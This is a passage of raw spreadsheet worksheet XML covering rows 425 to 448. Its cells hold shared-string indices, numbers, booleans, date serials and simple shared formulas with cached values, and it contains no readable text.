      <c r="D425" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E425" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F425" s="1" t="s">
        <v>258</v>
      </c>
      <c r="G425" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H425" s="4">
        <v>44782.15833333333</v>
      </c>
      <c r="I425" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J425" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K425" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L425" s="1">
        <v>6.0</v>
      </c>
      <c r="M425" s="1">
        <v>7.0</v>
      </c>
      <c r="N425" s="1" t="s">
        <v>2087</v>
      </c>
      <c r="O425" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P425" s="1" t="s">
        <v>2088</v>
      </c>
      <c r="Q425" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R425" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S425" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="1">
        <v>6001.0</v>
      </c>
      <c r="B426" s="2" t="s">
        <v>2089</v>
      </c>
      <c r="C426" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D426" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="E426" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F426" s="1" t="s">
        <v>2090</v>
      </c>
      <c r="G426" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H426" s="1" t="s">
        <v>2091</v>
      </c>
      <c r="I426" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J426" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="K426" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="L426" s="1">
        <v>6.0</v>
      </c>
      <c r="M426" s="1">
        <v>7.0</v>
      </c>
      <c r="N426" s="1" t="s">
        <v>2092</v>
      </c>
      <c r="O426" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="P426" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q426" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R426" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S426" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="1">
        <v>6011.0</v>
      </c>
      <c r="B427" s="2" t="s">
        <v>2093</v>
      </c>
      <c r="C427" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D427" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="E427" s="2" t="s">
        <v>2095</v>
      </c>
      <c r="F427" s="1" t="s">
        <v>1675</v>
      </c>
      <c r="G427" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H427" s="4">
        <v>44266.092361111114</v>
      </c>
      <c r="I427" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J427" s="1" t="s">
        <v>2096</v>
      </c>
      <c r="K427" s="2" t="s">
        <v>2097</v>
      </c>
      <c r="L427" s="1">
        <v>3.0</v>
      </c>
      <c r="M427" s="1">
        <v>6.0</v>
      </c>
      <c r="N427" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O427" s="1" t="s">
        <v>2098</v>
      </c>
      <c r="P427" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q427" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R427" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S427" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="1">
        <v>6012.0</v>
      </c>
      <c r="B428" s="2" t="s">
        <v>2099</v>
      </c>
      <c r="C428" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D428" s="2" t="s">
        <v>2094</v>
      </c>
      <c r="E428" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F428" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G428" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H428" s="4">
        <v>44266.478472222225</v>
      </c>
      <c r="I428" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J428" s="1" t="s">
        <v>2096</v>
      </c>
      <c r="K428" s="2" t="s">
        <v>2097</v>
      </c>
      <c r="L428" s="1">
        <v>3.0</v>
      </c>
      <c r="M428" s="1">
        <v>6.0</v>
      </c>
      <c r="N428" s="1" t="s">
        <v>2100</v>
      </c>
      <c r="O428" s="1" t="s">
        <v>2098</v>
      </c>
      <c r="P428" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q428" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R428" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S428" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="1">
        <v>6040.0</v>
      </c>
      <c r="B429" s="2" t="s">
        <v>2101</v>
      </c>
      <c r="C429" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D429" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E429" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F429" s="1" t="s">
        <v>2104</v>
      </c>
      <c r="G429" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H429" s="1" t="s">
        <v>2105</v>
      </c>
      <c r="I429" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J429" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K429" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L429" s="1">
        <v>5.0</v>
      </c>
      <c r="M429" s="1">
        <v>9.0</v>
      </c>
      <c r="N429" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O429" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P429" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q429" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R429" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S429" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="1">
        <v>6043.0</v>
      </c>
      <c r="B430" s="2" t="s">
        <v>2109</v>
      </c>
      <c r="C430" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D430" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E430" s="2" t="s">
        <v>2110</v>
      </c>
      <c r="F430" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G430" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H430" s="1" t="s">
        <v>2111</v>
      </c>
      <c r="I430" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J430" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K430" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L430" s="1">
        <v>5.0</v>
      </c>
      <c r="M430" s="1">
        <v>9.0</v>
      </c>
      <c r="N430" s="1" t="s">
        <v>2112</v>
      </c>
      <c r="O430" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P430" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q430" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R430" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S430" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="1">
        <v>6044.0</v>
      </c>
      <c r="B431" s="2" t="s">
        <v>2113</v>
      </c>
      <c r="C431" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D431" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E431" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F431" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G431" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H431" s="1" t="s">
        <v>2114</v>
      </c>
      <c r="I431" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J431" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K431" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L431" s="1">
        <v>5.0</v>
      </c>
      <c r="M431" s="1">
        <v>9.0</v>
      </c>
      <c r="N431" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O431" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P431" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q431" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R431" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S431" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="1">
        <v>6045.0</v>
      </c>
      <c r="B432" s="2" t="s">
        <v>2115</v>
      </c>
      <c r="C432" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D432" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E432" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F432" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G432" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H432" s="1" t="s">
        <v>2116</v>
      </c>
      <c r="I432" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J432" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K432" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L432" s="1">
        <v>5.0</v>
      </c>
      <c r="M432" s="1">
        <v>9.0</v>
      </c>
      <c r="N432" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O432" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P432" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q432" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R432" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S432" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="1">
        <v>6046.0</v>
      </c>
      <c r="B433" s="2" t="s">
        <v>2117</v>
      </c>
      <c r="C433" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D433" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E433" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F433" s="1" t="s">
        <v>2119</v>
      </c>
      <c r="G433" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H433" s="1" t="s">
        <v>2120</v>
      </c>
      <c r="I433" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J433" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K433" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L433" s="1">
        <v>5.0</v>
      </c>
      <c r="M433" s="1">
        <v>9.0</v>
      </c>
      <c r="N433" s="1" t="s">
        <v>2121</v>
      </c>
      <c r="O433" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P433" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q433" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R433" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S433" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="1">
        <v>6047.0</v>
      </c>
      <c r="B434" s="2" t="s">
        <v>2122</v>
      </c>
      <c r="C434" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D434" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E434" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F434" s="1" t="s">
        <v>1319</v>
      </c>
      <c r="G434" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H434" s="1" t="s">
        <v>2123</v>
      </c>
      <c r="I434" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J434" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K434" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L434" s="1">
        <v>5.0</v>
      </c>
      <c r="M434" s="1">
        <v>9.0</v>
      </c>
      <c r="N434" s="1" t="s">
        <v>2124</v>
      </c>
      <c r="O434" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P434" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q434" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R434" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S434" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="1">
        <v>6048.0</v>
      </c>
      <c r="B435" s="2" t="s">
        <v>2125</v>
      </c>
      <c r="C435" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D435" s="2" t="s">
        <v>2102</v>
      </c>
      <c r="E435" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F435" s="1" t="s">
        <v>2119</v>
      </c>
      <c r="G435" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H435" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="I435" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J435" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="K435" s="2" t="s">
        <v>2107</v>
      </c>
      <c r="L435" s="1">
        <v>5.0</v>
      </c>
      <c r="M435" s="1">
        <v>9.0</v>
      </c>
      <c r="N435" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O435" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="P435" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q435" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R435" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S435" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="1">
        <v>6068.0</v>
      </c>
      <c r="B436" s="2" t="s">
        <v>2127</v>
      </c>
      <c r="C436" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D436" s="2" t="s">
        <v>2128</v>
      </c>
      <c r="E436" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F436" s="1" t="s">
        <v>2129</v>
      </c>
      <c r="G436" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H436" s="1" t="s">
        <v>2130</v>
      </c>
      <c r="I436" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J436" s="1" t="s">
        <v>2131</v>
      </c>
      <c r="K436" s="2" t="s">
        <v>2132</v>
      </c>
      <c r="L436" s="1">
        <v>6.0</v>
      </c>
      <c r="M436" s="1">
        <v>7.0</v>
      </c>
      <c r="N436" s="1" t="s">
        <v>2133</v>
      </c>
      <c r="O436" s="1" t="s">
        <v>2134</v>
      </c>
      <c r="P436" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q436" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R436" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S436" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="1">
        <v>6069.0</v>
      </c>
      <c r="B437" s="2" t="s">
        <v>2135</v>
      </c>
      <c r="C437" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D437" s="2" t="s">
        <v>2136</v>
      </c>
      <c r="E437" s="2" t="s">
        <v>2137</v>
      </c>
      <c r="F437" s="1" t="s">
        <v>1195</v>
      </c>
      <c r="G437" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H437" s="1" t="s">
        <v>2138</v>
      </c>
      <c r="I437" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J437" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="K437" s="2" t="s">
        <v>2140</v>
      </c>
      <c r="L437" s="1">
        <v>2.0</v>
      </c>
      <c r="M437" s="1">
        <v>4.0</v>
      </c>
      <c r="N437" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O437" s="1" t="s">
        <v>2141</v>
      </c>
      <c r="P437" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q437" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R437" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S437" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="1">
        <v>6070.0</v>
      </c>
      <c r="B438" s="2" t="s">
        <v>2142</v>
      </c>
      <c r="C438" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D438" s="2" t="s">
        <v>2143</v>
      </c>
      <c r="E438" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F438" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="G438" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H438" s="1" t="s">
        <v>2145</v>
      </c>
      <c r="I438" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J438" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="K438" s="2" t="s">
        <v>2140</v>
      </c>
      <c r="L438" s="1">
        <v>2.0</v>
      </c>
      <c r="M438" s="1">
        <v>4.0</v>
      </c>
      <c r="N438" s="1" t="s">
        <v>2146</v>
      </c>
      <c r="O438" s="1" t="s">
        <v>2141</v>
      </c>
      <c r="P438" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q438" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R438" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S438" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="1">
        <v>6071.0</v>
      </c>
      <c r="B439" s="2" t="s">
        <v>2147</v>
      </c>
      <c r="C439" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D439" s="6" t="s">
        <v>2136</v>
      </c>
      <c r="E439" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F439" s="1" t="s">
        <v>1195</v>
      </c>
      <c r="G439" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H439" s="1" t="s">
        <v>2148</v>
      </c>
      <c r="I439" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J439" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="K439" s="2" t="s">
        <v>2140</v>
      </c>
      <c r="L439" s="1">
        <v>2.0</v>
      </c>
      <c r="M439" s="1">
        <v>4.0</v>
      </c>
      <c r="N439" s="1" t="s">
        <v>2149</v>
      </c>
      <c r="O439" s="1" t="s">
        <v>2141</v>
      </c>
      <c r="P439" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q439" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R439" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S439" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="1">
        <v>6075.0</v>
      </c>
      <c r="B440" s="2" t="s">
        <v>2150</v>
      </c>
      <c r="C440" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D440" s="2" t="s">
        <v>2151</v>
      </c>
      <c r="E440" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F440" s="1" t="s">
        <v>2152</v>
      </c>
      <c r="G440" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H440" s="4">
        <v>44079.89166666667</v>
      </c>
      <c r="I440" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J440" s="1" t="s">
        <v>2153</v>
      </c>
      <c r="K440" s="2" t="s">
        <v>2154</v>
      </c>
      <c r="L440" s="1">
        <v>5.0</v>
      </c>
      <c r="M440" s="1">
        <v>5.0</v>
      </c>
      <c r="N440" s="1" t="s">
        <v>2155</v>
      </c>
      <c r="O440" s="1" t="s">
        <v>2156</v>
      </c>
      <c r="P440" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q440" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R440" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S440" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="1">
        <v>6076.0</v>
      </c>
      <c r="B441" s="2" t="s">
        <v>2157</v>
      </c>
      <c r="C441" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D441" s="2" t="s">
        <v>2158</v>
      </c>
      <c r="E441" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F441" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G441" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H441" s="4">
        <v>44079.92152777778</v>
      </c>
      <c r="I441" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J441" s="1" t="s">
        <v>2153</v>
      </c>
      <c r="K441" s="2" t="s">
        <v>2154</v>
      </c>
      <c r="L441" s="1">
        <v>5.0</v>
      </c>
      <c r="M441" s="1">
        <v>5.0</v>
      </c>
      <c r="N441" s="1" t="s">
        <v>2159</v>
      </c>
      <c r="O441" s="1" t="s">
        <v>2156</v>
      </c>
      <c r="P441" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q441" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R441" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S441" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="1">
        <v>6078.0</v>
      </c>
      <c r="B442" s="2" t="s">
        <v>2160</v>
      </c>
      <c r="C442" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D442" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="E442" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F442" s="1" t="s">
        <v>2162</v>
      </c>
      <c r="G442" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H442" s="1" t="s">
        <v>2163</v>
      </c>
      <c r="I442" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J442" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="K442" s="2" t="s">
        <v>2165</v>
      </c>
      <c r="L442" s="1">
        <v>4.0</v>
      </c>
      <c r="M442" s="1">
        <v>8.0</v>
      </c>
      <c r="N442" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O442" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="P442" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q442" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R442" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S442" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="1">
        <v>6079.0</v>
      </c>
      <c r="B443" s="2" t="s">
        <v>2167</v>
      </c>
      <c r="C443" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D443" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="E443" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F443" s="1" t="s">
        <v>2168</v>
      </c>
      <c r="G443" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H443" s="1" t="s">
        <v>2169</v>
      </c>
      <c r="I443" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J443" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="K443" s="2" t="s">
        <v>2165</v>
      </c>
      <c r="L443" s="1">
        <v>4.0</v>
      </c>
      <c r="M443" s="1">
        <v>8.0</v>
      </c>
      <c r="N443" s="1" t="s">
        <v>2155</v>
      </c>
      <c r="O443" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="P443" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q443" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R443" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S443" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="1">
        <v>6080.0</v>
      </c>
      <c r="B444" s="2" t="s">
        <v>2170</v>
      </c>
      <c r="C444" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D444" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="E444" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F444" s="1" t="s">
        <v>2162</v>
      </c>
      <c r="G444" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H444" s="1" t="s">
        <v>2171</v>
      </c>
      <c r="I444" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J444" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="K444" s="2" t="s">
        <v>2165</v>
      </c>
      <c r="L444" s="1">
        <v>4.0</v>
      </c>
      <c r="M444" s="1">
        <v>8.0</v>
      </c>
      <c r="N444" s="1" t="s">
        <v>2172</v>
      </c>
      <c r="O444" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="P444" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q444" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R444" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S444" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="1">
        <v>6084.0</v>
      </c>
      <c r="B445" s="2" t="s">
        <v>2173</v>
      </c>
      <c r="C445" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D445" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="E445" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F445" s="1" t="s">
        <v>2174</v>
      </c>
      <c r="G445" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H445" s="1" t="s">
        <v>2175</v>
      </c>
      <c r="I445" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J445" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="K445" s="2" t="s">
        <v>2165</v>
      </c>
      <c r="L445" s="1">
        <v>4.0</v>
      </c>
      <c r="M445" s="1">
        <v>8.0</v>
      </c>
      <c r="N445" s="1" t="s">
        <v>2176</v>
      </c>
      <c r="O445" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="P445" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q445" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R445" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S445" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="1">
        <v>6085.0</v>
      </c>
      <c r="B446" s="2" t="s">
        <v>2177</v>
      </c>
      <c r="C446" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D446" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="E446" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F446" s="1" t="s">
        <v>910</v>
      </c>
      <c r="G446" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H446" s="1" t="s">
        <v>2178</v>
      </c>
      <c r="I446" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J446" s="1" t="s">
        <v>2164</v>
      </c>
      <c r="K446" s="2" t="s">
        <v>2165</v>
      </c>
      <c r="L446" s="1">
        <v>4.0</v>
      </c>
      <c r="M446" s="1">
        <v>8.0</v>
      </c>
      <c r="N446" s="1" t="s">
        <v>2179</v>
      </c>
      <c r="O446" s="1" t="s">
        <v>2166</v>
      </c>
      <c r="P446" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q446" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R446" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S446" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="1">
        <v>6093.0</v>
      </c>
      <c r="B447" s="2" t="s">
        <v>2180</v>
      </c>
      <c r="C447" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D447" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="E447" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F447" s="1" t="s">
        <v>2182</v>
      </c>
      <c r="G447" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H447" s="4">
        <v>44714.92361111111</v>
      </c>
      <c r="I447" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J447" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="K447" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="L447" s="1">
        <v>4.0</v>
      </c>
      <c r="M447" s="1">
        <v>11.0</v>
      </c>
      <c r="N447" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O447" s="1" t="s">
        <v>2185</v>
      </c>
      <c r="P447" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q447" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R447" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S447" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="1">
        <v>6096.0</v>
      </c>
      <c r="B448" s="2" t="s">
        <v>2186</v>
      </c>
      <c r="C448" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D448" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="E448" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F448" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G448" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H448" s="4">
        <v>44714.9375</v>
      </c>
      <c r="I448" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J448" s="1" t="s">
        <v>2183</v>
      </c>
      <c r="K448" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="L448" s="1">
        <v>4.0</v>
      </c>
      <c r="M448" s="1">
        <v>11.0</v>
